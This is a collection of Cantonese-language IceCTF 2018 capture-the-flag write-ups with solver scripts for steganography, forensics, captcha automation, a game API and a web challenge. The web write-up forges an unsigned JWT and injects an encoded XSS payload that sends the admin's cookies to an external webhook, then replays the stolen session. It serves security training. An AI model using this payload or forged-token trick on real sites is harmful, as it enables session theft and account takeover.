IceCTF2018-Drumbone

Question

Solution

Stegosolve

最後放番大D點

from PIL import Image, ImageFont, ImageDraw

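flagImage = Image.new('RGB', (1000,1000), "white")
im = Image.open('solved.bmp')
im = im.convert('RGB')

# One drawing context for the whole pass.  The original re-created it for
# every black pixel, which only wastes allocations; the output is identical.
dr = ImageDraw.Draw(flagImage)

# Scan region is hard-coded; presumably solved.bmp is 350x229 — TODO confirm
# against the file, getpixel() raises IndexError past the image bounds.
for x in range(350):
    for y in range(229):
        # Every pure-black source pixel becomes a small filled square whose
        # top-left corner is the same (x, y) on the larger output canvas.
        if im.getpixel((x,y)) == (0,0,0):
            dr.rectangle(((x,y),(x+5,y+5)), fill="black", outline = "black")
flagImage.save("flag2.png")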

IceCTF2018-Lost-in-the-forest

Question

fz.zip

Solution

發現左個奇怪既file /home/hkr/.bash_history

git
exit
cd root
pwd
ls
ls -la
exit
cat /etc/hostname
exit
cat /etc/hostname
exit
cat /eyc/hostname
cat /etc/hostname
echo Centos >> /etc/hostname
bash
echo Centos > /etc/hostname
bash
exit
cd ~/.i3
cd ~
ls
pwd
cd ..
ls
cd .i3
pwd
ls -a
cd ~/.i3
cd
ls
ls -a
pwd
cd ..
ls
ls -a
cd ..
ls
ls -a
cd etc
ls
ls -a
cd i3
ls
cd
ls
ls -a
mkdir .i3
ls
ls -a
ls
ls -a
cd Documents/
ls
mv config ~/.i3
ls
cd ..
ls
ls -a
cd .i3
ls
cd
cd documents
cd Documents/
ls
cd
ls
cd .i3
ls
sudo subl config
cd
ls
cd Pictures/
ls
pwd
cd ..
ls
ls 0a
ls -a
cd bin
ls
cd
ls
cd
ls
ls -a
cd .bashrc
sudo subl .bashrc
sudo subl .bash_aliases
ls
brightness
ls
sudo echo 200 > brightness
sudo su
cd
cd Downloads
wget https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp
cd
ls
sudo subl .bash_aliases
backlight
brightrness
brightness
ls
cd
command-list
alias-list
alias-list
alias-list
sudo subl .bashrc
sudo subl .bash_aliases
i3-config
alias-list
brightness
i3-config
alias-list
sudo subl .bashrc
alias-list
sudo subl .bashrc
alias-list
bash_aliases
. ~/.bash_aliases
sudo subl .bash_welcome
sudo subl .bash_todo
alias-list
todo
to-do
edit-todo
to-do
cd
alias-list
edit-todo
cd Downloads
ls -a
mv eRkjLlksZp tool.py
cat .bash_aliases
sudo subl .bash_aliases
alias-list
cat .bash_aliases
ls -a
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 libbz2-1.0:i386
javac -version
sudo apt update
apt list --upgradable
javac -version
sudo apt install oracle-java8-installer
javac -version
sudo apt install oracle-java8-set-default
ls
cd bin
ls
./studio.sh
ls
cd android
cd Android/
ls
cd ..
ls
cd ..
cd
./studio.sh
cd ..
ls
cd ..
ls
cd /mnt
ls
cd
cd Downloads
./tool.py ../secret > ../hzpxbsklqvboyou
ls -a
cd ..
ls
cd usr/
ls
cd bin
ls
ls ..
ls
cd ..
ls
cd locals
cd local
ls
cd android-studio/
ls
cd
shred secret
ls
ls -a
sudo subl .bash_aliases
android-studio
ls
ls Documents/
ls
cd Documents/
ls
cd ..
cd Downloads/
rm tool.py
ls
ls
cd
ls
git
sudo apt install git
git config --global user.name "skuli"
git config --global user.email "sheep.man@fake.com"
ls -a
cat .gitconfig
cd Documents/
ls
mkdir projects
ls
cd projects
pwd
cd ..
cd Downloads/
cd java/
ls
cd jre1.8.0_171/
ls
cd bin/
ls
cd ..
cd jre1.8.0_171/
ls
cat README
cd ..
ls
cd ..
ls
cd local/
ls
cd bin/
ls
ls
cd 3840x2160/
ls
cd ..
cd .
cd ..
ls -al
cd .local/
ls
cd share/
ls
ls
cd Write/
ls
sudo chmod +x INSTALL
ls
sudo ./INSTALL
sudo chmod -x INSTALL
cat INSTALL
ls
./Write
ls
cd ..
ls
sudo rm write209.tar.gz
sudo rm -R Write/
ls
cd ..
ls
ls
ls -al
grep / "howdy" 2> /dev/null
cd ..
grep -r "howdy" 2> /dev/null
ls /lib/security/
cd /lib/security/
ls
ls -al
tree
cd howdy/
ls
./cli
./cli.py
ls
exit

有個奇怪既 tools link

https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp

#!/usr/bin/python3
import sys
import base64

def encode(filename):
    """Read the first line of *filename* and return its obfuscated form.

    The line (surrounding whitespace stripped) is shifted character by
    character by a fixed 14-entry offset table repeated three times, so at
    most 42 characters are supported (longer lines raise IndexError).  The
    shifted text is base64-encoded, reversed, and the reversed text is
    repeated five times.
    """
    with open(filename, "r") as handle:
        line = handle.readline().strip()
    table = [5, -1, 3, -3, 2, 15, -6, 3, 9, 1, -3, -5, 3, -15] * 3
    shifted = "".join(chr(ord(ch) + table[i]) for i, ch in enumerate(line))
    encoded = base64.b64encode(shifted.encode('utf-8')).decode('utf-8')
    return encoded[::-1] * 5

if __name__ == "__main__":
    # CLI usage: tool.py <path>; the single argument is the file to encode.
    target = sys.argv[1]
    print(encode(target))

同場加映一個奇怪既file /home/hkr/hzpxbsklqvboyou

8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT

似是而非既 base64..

好似係用條script encode出黎架喎 , 咁調番轉黎寫囉…

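def decode(token="8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT"):
    """Invert tool.py's encode() for one repetition of its output.

    *token* is a single copy of the reversed base64 text (the recovered file
    holds it five times over).  It is reversed back, base64-decoded, and each
    byte is shifted by the negated offset table.  The plaintext is printed,
    as the original script did, and also returned so callers can use it.

    Raises ValueError if the decoded data is longer than the 42-entry table
    (the original died with an IndexError at that point).
    """
    import base64  # local: the snippet is pasted into a file that may not import it
    # bytearray yields ints on both Python 2 and 3, so no ord() is needed and
    # the snippet no longer depends on the Python 2 str-from-b64decode quirk.
    enc = bytearray(base64.b64decode(token[::-1]))
    mDict = [5, -1, 3, -3, 2, 15, -6, 3, 9, 1, -3, -5, 3, -15] * 3
    if len(enc) > len(mDict):
        raise ValueError("decoded data longer than the offset table")
    plain = "".join(chr(byte - off) for byte, off in zip(enc, mDict))
    print(plain)
    return plain


decode()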

IceCTF2018-HardShells

Question

hardshells

Solution

睇左睇個魔法頭 , 好似係 zip file. 不過有密碼
是但扔入去個 ARCHPR 到等左幾秒就爆左個密碼出黎

tacos

之後入面有個file 叫d
d

睇個魔法頭好似係爛左個png黎
張圖係由0xec00開始

0xec03 改做 0x4e
0x10800 - 0x10bf0 刪左佢
頭尾D空白刪晒佢
改番d crc 就完事

IceCTF2018-Anticaptcha

Solution

比左個網 , 入面有百尻幾條問題 , 自動解啦咁

import requests
from bs4 import BeautifulSoup
from math import sqrt; from itertools import count, islice
import gmpy2

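# Fixed-answer questions, matched by substring in the order the original
# if/elif chain tested them.
_FIXED_ANSWERS = [
    ("Which planet is closest to the sun", "Mercury"),
    ("What is the capital of Germany", "Berlin"),
    ("How many planets are between Earth and the Sun?", "2"),
    ("How many strings does a violin have?", "4"),
    ("What is the tallest mountain on Earth?", "Mount Everest"),
    ("What year is it?", "2018"),
    ("What color is the sky?", "Blue"),
    ("Who directed the movie Jaws?", "Steven Spielberg"),
    ("What is the capital of Hawaii?", "Honolulu"),
]


def solveQuestion(s):
    """Answer one anti-captcha question *s* and return the answer.

    Three question shapes are parsed (n-th word of a line, primality, gcd);
    everything else is fixed trivia matched by substring.  A question that
    matches nothing is printed so the operator can add a rule, and None is
    returned (the caller then posts the string "None" for that slot).
    """
    if "word in the following line" in s:
        # "What is the 3rd word in the following line: a b c" -> "c".
        # Newlines and full stops are folded into spaces before splitting.
        # (The original also had a no-op replace(" ", " "), presumably a lost
        # non-breaking space; it has been dropped.)
        s = s.replace("\n", " ").replace(".", " ")
        ordinal = s.split(" ")[3]
        for suffix in ("th", "st", "nd", "rd"):
            ordinal = ordinal.replace(suffix, "")
        num = int(ordinal)
        return s.split(": ")[1].split(" ")[num - 1]
    if "a prime number" in s:
        num = int(s.split(" ")[1])
        return str(gmpy2.is_prime(num)).lower()
    if "What is the greatest common divisor" in s:
        num1 = int(s.split(" ")[7])
        num2 = int(s.split(" ")[9].replace("?", ""))
        return gmpy2.gcd(num1, num2)
    for needle, answer in _FIXED_ANSWERS:
        if needle in s:
            return answer
    print(s)  # unrecognised question: surface it rather than fail silently
    return None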

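s = requests.Session()
content = s.get("https://43xa7xhkaj0cd8c-anticaptcha.labs.icec.tf/").text
soup = BeautifulSoup(content, 'html.parser')

# Questions sit in every other <td>; the cell in between is presumably the
# answer column — TODO confirm against the page markup.
td_tags = soup.find_all("td")
answer = [str(solveQuestion(td.string)) for td in td_tags[::2]]

# Same session, so the server's cookie ties the answers to the questions it
# served.  Only the head of the response is shown.
print(s.post("https://43xa7xhkaj0cd8c-anticaptcha.labs.icec.tf/", data={'answer':answer}).text[:2000])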

IceCTF2018-Pokeamango

Question

pokeamango.apk

Solution

開左個app黎睇 , 係極簡化版既 pokemonGO , d mango會係地圖到show出黎 , 禁落去就會開相機 , 禁隻mango就會捉左
但係要捉150隻手動真係不了

Decompile完之後見到 assets/www/ , 隻app似乎 d logic係晒 web到
見到map.js有段係

// Re-centre the map on the player and fetch the mangos around them.
// Relies on page-level state defined elsewhere in map.js (presumably):
// map, currentPos, mangos, uuid, plus the google.maps and jQuery globals.
var updateMap = function() {
    console.log("updating map");
    map.setCenter(currentPos);

    // Clear mangos
    for (var i = 0; i < mangos.length; i++) {
        mangos[i].setMap(null);
    }
    mangos = [];

    var user = new google.maps.Marker({
        position: currentPos,
        map: map,
        icon: 'img/user_marker.png'
    });

    // You're my favorite mango
    mangos.push(user);

    // NOTE(review): lat/lng are read here as properties, while the click
    // handler below calls currentPos.lat() / .lng() as methods; one of the
    // two is presumably wrong for the type of currentPos — verify.
    var payload = {
        lat: currentPos.lat,
        long: currentPos.lng
    }

    // The device uuid is the only client identity in the request; the
    // write-up's standalone script reproduces this call with just that
    // value, i.e. the server does not tie it to the app in any way.
    payload["uuid"] = uuid

    // Plain-HTTP endpoint: uuid and position travel in clear.
    $.post("http://pokeamango.vuln.icec.tf/mango/list", payload, function(results){
        var data = results["mangos"];
        for (var i = 0; i < data.length; i++) {
            var place = data[i];

            var mango = new google.maps.Marker({
                position: place,
                map: map,
                icon: 'img/mangie_marker.png'
            });

            mangos.push(mango);

            // `this` is the clicked marker.  The four coordinates are handed
            // to camera.html through window.name rather than the URL.
            mango.addListener('click', function(event){
                window.name = (currentPos.lat()) + "," + (currentPos.lng()) + "," + (this.getPosition().lat()) + "," + (this.getPosition().lng());
                window.location.href = "camera.html";
            });
        }
    });
};

似乎

http://pokeamango.vuln.icec.tf/mango/list

係用黎list d mongo出黎

睇埋 map.js

// Report a catch to the server, toast its reply, animate the mango off the
// screen and return to the map a second later.  Reads the player/mango
// coordinates and the device uuid from page-level state.
function catchMango() {
    var form = {
        "curLat": currentPosLat,
        "curLong": currentPosLng,
        "mangoLat": mangoPosLat,
        "mangoLong": mangoPosLng,
        "uuid": device.uuid
    };

    var onReply = function(results) {
        var onToastOk = function(a) { console.log('toast success: ' + a); };
        var onToastErr = function(b) { alert('toast error: ' + b); };
        window.plugins.toast.showLongBottom(results["message"], onToastOk, onToastErr);

        var mangoEl = $("#mango");
        mangoEl.removeClass("bounce infinite");
        mangoEl.addClass("bounceOutRight");
        setTimeout(function() { window.location.href = "map.html"; }, 1000);
    };

    // Plain-HTTP endpoint; the server sees only the uuid as client identity.
    $.post("http://pokeamango.vuln.icec.tf/mango/catch", form, onReply);
};

咁有齊料自動捉mango啦

import requests
import json

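uuid = "46fc1c22626b960c"
currentLat = "22.3208988"
currentLng = "114.1891175"

# Poll /mango/list for the fixed position, report each mango it returns to
# /mango/catch, then print the running count.  Runs until interrupted; once
# the list comes back empty, change currentLat/currentLng and rerun.
#
# The requests carry only the device uuid as identity, which appears to be
# all the server checks — the app is not needed to drive these endpoints.
while True:
    c = requests.post("http://pokeamango.vuln.icec.tf/mango/list", data={'lat':currentLat, 'long':currentLng, 'uuid':uuid}).text
    print(c)
    j = json.loads(c)
    for m in j['mangos']:  # an empty list simply means nothing to catch this round
        lat = m['lat']
        lng = m['lng']
        print(requests.post("http://pokeamango.vuln.icec.tf/mango/catch", data={'uuid':uuid, 'curLat':currentLat, 'curLong':currentLng, 'mangoLat':lat, 'mangoLong':lng}).text)
    print("Count: " + requests.post("http://pokeamango.vuln.icec.tf/mango/count", data={'uuid':uuid}).text)

# Sample /mango/list reply, as observed:
# {
#     "mangos": [{
#         "lat": 22.319894,
#         "lng": 114.232087
#     }],
#     "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1dWlkIjoiNDZmYzFjMjI2MjZiOTYwYyJ9._qZPGKdWiHoRa5Jq0OgLwZC-9-nwZD8VYONsCtuM_b8"
# }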

當捉到無野捉之後 , 轉一個個currentLat , currentLng就可以繼續行

IceCTF2018-Ancient-Foreign-Communication

Question

E2 A8 85 5D 5D E2 8C 9E E2 8C 9E E2 8C 9F 5B E2 A8 86 5D E2 8C 9F 5D 5D 5D E2 A8 86 E2 A8 86 E2 A8 86 E2 8C 9C 5B 5B 5B E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 A8 86 E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9E E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9F E2 8C 9D E2 8C 9D E2 A8 85 E2 A8 85 E2 8C 9E E2 8C 9E E2 A8 86 5B 5D 5D 5D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D 5D 5D E2 8C 9F 5B 5B 5B E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9F E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D 5D 5D 5D E2 8C 9E E2 8C 9E E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 A8 86 5D E2 8C 9E E2 8C 9E

Solution

直接 UTF-8 decode 得出

⨅]]⌞⌞⌟[⨆]⌟]]]⨆⨆⨆⌜[[[⌝⌝⌝⌞⌝⌝⌝⌝⨆⌝⌝⌝⌞⌞⌝⌝⌝⌝⌟⌝⌝⨅⨅⌞⌞⨆[]]]⌝⌝⌝⌝]]⌟[[[⌝⌝⌝⌝⌟⌝⌝⌝⌝]]]⌞⌞⌞⌝⌝⌝⨆]⌞⌞

睇住個phone numpad 唔知點解諗到

⨅]]⌞⌞⌟[⨆]⌟]]]⨆⨆⨆⌜[[[⌝⌝⌝⌞⌝⌝⌝⌝⨆⌝⌝⌝⌞⌞⌝⌝⌝⌝⌟⌝⌝⨅⨅⌞⌞⨆[]]]⌝⌝⌝⌝]] ⌟ [[[⌝⌝⌝⌝⌟⌝⌝⌝⌝]]]⌞⌞⌞⌝⌝⌝⨆]⌞⌞
THE mag icwordsares queamish os sifrage
The magic words are squeamish ossifrage

IceCTF2018-ilovebees

Question

https://static.icec.tf/iloveflowers/

Solution

上網搵左搵 , 原來係抄 halo2 宣傳橋段入面果個網既
http://www.ilovebees.co/

對比完2個網既source code之後發現 , 原版係冇favicon.
問題一定係出係favicon身上!

首先extract晒d frame出黎先啦 , 之後再用script拎番每幅圖既每一粒pixel既r,g,b合埋就搞掂

from PIL import Image, ImageFont, ImageDraw

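# Concatenate the RGB bytes of every pixel of every favicon frame into one
# file.  110 frames of 16x16 are read in order; the output is raw bytes,
# not an image — the original built a hex string and decoded it, which only
# works on Python 2 (str.decode('hex')).  Collecting bytes directly gives the
# same output on both versions.
c = bytearray()
for i in range(110):
    im = Image.open('frame_' + str(i).zfill(3) + '_delay-0.1s.gif')
    im = im.convert('RGB')
    # Note the swapped indices: x is the row here and y the column, so the
    # bytes come out in row-major order.
    for x in range(16):
        for y in range(16):
            r, g, b = im.getpixel((y, x))
            c.extend((r, g, b))
with open("ilovebees", "wb") as f:
    f.write(bytes(c))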

IceCTF2018-HotOrNot

Question

Solution

咁個標題都講左係要認熱狗同狗 , 咁我思路就係認晒圖入面咁多張 , 當最後個output係就白色 唔係就黑色咁先啦

首先切做均等大細先

from PIL import Image, ImageFont, ImageDraw

# Lift PIL's decompression-bomb guard just enough for this one file:
# 379782144 = 19488 * 19488, i.e. an 87x87 grid of 224-pixel tiles, which is
# presumably the size of hotornot.jpg.
Image.MAX_IMAGE_PIXELS = 379782144

im = Image.open('hotornot.jpg')

TILE = 224
GRID = 87
# Tiles are saved as 1.jpg .. 7569.jpg, walking down each column first
# (the outer loop is the x offset); the driver script later sorts by number.
for col in range(GRID):
    for row in range(GRID):
        left = TILE * col
        top = TILE * row
        box = (left, top, left + TILE, top + TILE)
        tile_no = col * GRID + row + 1
        im.crop(box).save(str(tile_no) + ".jpg")

最後出左7569張圖

咁之後就要做認圖果part啦 , 因為我懶 , 咁是但上網搵個library用算啦
最後就搵到呢個 https://github.com/jramasani/hotdog-nothotdog

最後都係跟番佢

docker run -it   --publish 6006:6006   --volume ${HOME}/tf_files:/tf_files   --workdir /tf_files   tensorflow/tensorflow:latest-devel

然後改左改佢條script

import os, sys

import tensorflow as tf

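os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'

# Classify a single JPEG (the only command-line argument) with the retrained
# graph and print one character: "1" for hotdog, "0" otherwise.  The unused
# directory listing from the original has been dropped; it lives in the
# driver script.
image_path = sys.argv[1]

# Read in the image_data (close the handle promptly; the original leaked it)
with tf.gfile.FastGFile(image_path, 'rb') as img:
    image_data = img.read()

# Loads label file, strips off carriage return
label_lines = [line.rstrip() for line
               in tf.gfile.GFile("/tf_files/retrained_labels.txt")]

# Unpersists graph from file
with tf.gfile.FastGFile("/tf_files/retrained_graph.pb", 'rb') as f:
    graph_def = tf.GraphDef()
    graph_def.ParseFromString(f.read())
    tf.import_graph_def(graph_def, name='')

with tf.Session() as sess:
    # Feed the image_data as input to the graph and get first prediction
    softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')

    predictions = sess.run(softmax_tensor,
                           {'DecodeJpeg/contents:0': image_data})

    # Sort to show labels of first prediction in order of confidence
    top_k = predictions[0].argsort()[-len(predictions[0]):][::-1]

    # Keep the "hotdog" score; for any other label the last one seen wins,
    # which is unambiguous only for the two-label model this presumably is.
    hotScore = 0
    notHotScore = 0
    for node_id in top_k:
        human_string = label_lines[node_id]
        score = predictions[0][node_id]
        if human_string == "hotdog":
            hotScore = score
        else:
            notHotScore = score
    print("1" if hotScore > notHotScore else "0")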

自己用黎call 上面果條script既script

import os
from subprocess import call, check_output

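# Every numbered tile in ./hotornot, in numeric order (names are "<n>.jpg").
files = [file for file in os.listdir('./hotornot') if file.endswith('.jpg')]
files.sort(key=lambda x: int(x[:-4]))
print(files)

# One character per tile ("1"/"0") as printed by label_hotnot.py, in order.
# The classifier is invoked with an argument list rather than a shell string
# built from the file name, so nothing in the directory can be interpreted
# by a shell; unlike os.popen(), a non-zero exit now raises CalledProcessError
# instead of silently contributing an empty result.
result = ""
for index, name in enumerate(files, 1):
    output = check_output(["python", "label_hotnot.py", "./hotornot/" + name])
    result += output.decode("utf-8").replace("\n", "")
    print("Status: " + str(index) + " / " + str(len(files)))

# Text mode: result is a str, and the original's "wb" only worked on Python 2.
with open("result.txt", "w") as out:
    out.write(result)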

最後似係qrcode , 然後執左執

IceCTF2018-History-Of-Computer

Solution

首先一入到去見到有得註冊喎 , 咁註冊完登入睇下咩料子先啦
發現有得留 comment , 留個試下先, 留完仲有得report添喎 , 仲唔係玩xss?

發現有2個奇怪既 cookies , 分別係 session 同埋 token

咁似 base64 既 , decode黎睇下先

import base64
#session
# Looks like a signed cookie in "payload.timestamp.signature" form (the same
# shape shows up in the captured admin cookie later).  b64decode() discards
# the "." separators by default, so the bytes after {"user":2} are the
# timestamp and signature run together, not more JSON.
base64.b64decode('eyJ1c2VyIjoyfQ.Dno_HQ.0n1XWQBTVFhQ9NxFkuqWKik5uJU==')
#{"user":2}\x00\xe7\xa0t4\x9fU\xd6@\x14\xd5\x16\x14=7\x11d\xba\xa5\x8a\x8aNn%

#token
# First JWT segment: the algorithm is "none".  A server that honours this
# header accepts the claims unsigned; the rest of the write-up shows that is
# exactly what happened here.
base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=')
#{"typ":"JWT","alg":"none"}
# Second segment: the claims, readable by anyone holding the cookie.
base64.b64decode('eyJ1c2VybmFtZSI6ImNhdHBhd24iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0==')
#{"username":"catpawn","flag":"IceCTF{hope you don\'t think this is a real flag}"}

咁發現有個 username 喎 , 同埋 user係2. 有2咁應該有1啦 , 我諗終極目標係拎到user:1 既登入資料掛?
咁試下改個username啦

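import base64
# Claims segment with the username swapped for "admin".  With alg "none" in
# the header there is no signature to recompute, which is the whole problem:
# the server should reject unsigned tokens outright.  The .encode()/.decode()
# pair makes the snippet behave the same on Python 2 and 3 (py3's b64encode
# takes bytes); the original was Python 2 only.
token = base64.b64encode('{"username":"admin","flag":"IceCTF{hope you don\'t think this is a real flag}"}'.encode("utf-8")).decode("ascii")
print(token)
#eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9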

改完之後發現右上角個username係無變過既 , 留個言試下先啦咁唯有

竟然都係無變過!!! cookies save得唔會冇用掛 , 盡下人事禁埋入去 comment 到睇

竟然變左!! , 咁開始試下構造D xss payload玩弄下個website啦

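import base64  # the original read "improt base64", a SyntaxError
# Same forged claims segment with a script tag as the username — the first
# XSS probe.  The write-up notes the site filters this, so it did not fire.
# .encode()/.decode() keep the snippet Python 2/3 neutral.
token = base64.b64encode('{"username":"<script>alert(1)</script>","flag":"IceCTF{hope you don\'t think this is a real flag}"}'.encode("utf-8")).decode("ascii")
print(token)
#eyJ1c2VybmFtZSI6IjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=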

但是原來有做 filtering

試下試下發現佢好似扑左都幾多野。結果最後試左呢抽野出黎係work既

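import base64
# Same forged segment; the event handler's JavaScript is spelled as HTML
# numeric character references (listed below the snippet).  The browser
# decodes those when it parses the attribute, so the server-side keyword
# filter that stopped "<script>" never sees "alert".  Takeaway for the
# defence: a deny-list on stored input is no substitute for encoding the
# username at output time — and here the username came from an unverified
# token in the first place.  .encode()/.decode() keep the snippet 2/3 neutral.
token = base64.b64encode('{"username":"<img src=x onerror=\'&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}'.encode("utf-8")).decode("ascii")
print(token)
#eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDYmIzk3JiMxMTgmIzk3JiMxMTUmIzk5JiMxMTQmIzEwNSYjMTEyJiMxMTYmIzU4JiM5NyYjMTA4JiMxMDEmIzExNCYjMTE2JiM0MCYjMzkmIzg4JiM4MyYjODMmIzM5JiM0MSc+IiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9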

呢抽野

&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41

其實係

javascript:alert('XSS')

大家可以用呢個網試下轉
http://evuln.com/tools/xss-encoder/

然後就可以構造個http request比admin access啦

// What the entity-encoded onerror handler below expands to: a synchronous
// GET to an external listener with document.cookie in the query string.
// That it worked (see the captured request further down) means the session
// and token cookies were readable from page script, i.e. not HttpOnly; that
// one flag would have kept them out of this request.
function httpGet(){var xmlHttp = new XMLHttpRequest();xmlHttp.open("GET", "https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=" + document.cookie, false );xmlHttp.send( null );}httpGet();

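import base64
# Forged segment whose username carries the httpGet() snippet above as HTML
# numeric character references inside an onerror attribute.  Reporting a
# comment gets this rendered in an admin-side browser, which is where the
# cookies in the captured request came from.  Two controls would each have
# broken this chain: verifying the token's signature (alg "none" should be
# refused) and HttpOnly on the session cookie.  .encode()/.decode() keep
# the snippet Python 2/3 neutral.
token = base64.b64encode('{"username":"<img src=x onerror=\'&#102&#117&#110&#99&#116&#105&#111&#110&#32&#104&#116&#116&#112&#71&#101&#116&#40&#41&#123&#118&#97&#114&#32&#120&#109&#108&#72&#116&#116&#112&#32&#61&#32&#110&#101&#119&#32&#88&#77&#76&#72&#116&#116&#112&#82&#101&#113&#117&#101&#115&#116&#40&#41&#59&#120&#109&#108&#72&#116&#116&#112&#46&#111&#112&#101&#110&#40&#34&#71&#69&#84&#34&#44&#32&#34&#104&#116&#116&#112&#115&#58&#47&#47&#119&#101&#98&#104&#111&#111&#107&#46&#115&#105&#116&#101&#47&#57&#50&#56&#101&#52&#53&#48&#49&#45&#52&#98&#55&#51&#45&#52&#52&#57&#49&#45&#97&#51&#100&#101&#45&#49&#48&#101&#48&#99&#97&#100&#55&#56&#57&#99&#98&#63&#97&#61&#34&#32&#43&#32&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#44&#32&#102&#97&#108&#115&#101&#32&#41&#59&#120&#109&#108&#72&#116&#116&#112&#46&#115&#101&#110&#100&#40&#32&#110&#117&#108&#108&#32&#41&#59&#125&#104&#116&#116&#112&#71&#101&#116&#40&#41&#59\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}'.encode("utf-8")).decode("ascii")
print(token)
#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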

然後禁 report , 再等幾秒

1
https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.; session=eyJ1c2VyIjoxfQ.Dnm2FA.P93MJ-Nl9MSAc0DO0eRqNcUQGrU

最後 get flag!

import requests
# Cookie jar assembled from the captured admin request: the forged alg-none
# token (note the empty signature segment after the final ".") and the
# admin's own signed session cookie.  The server accepting that token is the
# weakness the flag text names.
cookie = {'token':'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.', 'session':'eyJ1c2VyIjoxfQ.Dnm2FA.P93MJ-Nl9MSAc0DO0eRqNcUQGrU'}
# Returns the page HTML shown below, with the flag in the banner div.
requests.get("https://43xa7xhkaj0cd8c-history.labs.icec.tf/", cookies=cookie).text

<!DOCTYPE html>
<html>
<head>
<!--Import Google Icon Font-->
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<!--Import materialize.css-->

<link type="text/css" rel="stylesheet" href="/static/css/materialize.min.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/main.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/style.css" media="screen,projection"/>

<!--Let browser know website is optimized for mobile-->
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
</head>
<body>

<nav>
<div class="nav-wrapper white">
<div class="container">
<a href="/" class="brand-logo">History of Computing</a>
<ul id="nav-mobile" class="right hide-on-med-and-down">

<li>admin</li>

<li><a href="/logout">Logout</a></li>

</ul>
</div>
</div>
</nav>



<div class="ribbon pink"></div>
<div class="container">

<div class="flag center blue white-text">
IceCTF{who_trusts_these_cookies_anyway?}
</div>

<div class="row post">
<div class="col s12">
<div class="card">
<div class="card-image">
<img src="/static/img/icectfteam.jpg">
<span class="card-title">The First Compiler</span>
</div>

<a class="btn-floating btn-large waves-effect waves-light pink comment-btn modal-trigger" href="#comment-modal" data-id="1"><i class="material-icons">comment</i></a>


<div class="card-content">
<h5>IceCTF Worked on The First Compiler</h5>
<p>It\'s not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper</p>
<p>The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.</p>
<p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p>
</div>
</div>
</div>
</div>

</div>

<div class="ribbon cyan"></div>
<div class="container">
<div class="row">
<div class="col s12">
<div class="card">
<div class="card-image">
<img src="/static/img/eniac.jpg">
<span class="card-title">The ENIAC!</span>
</div>

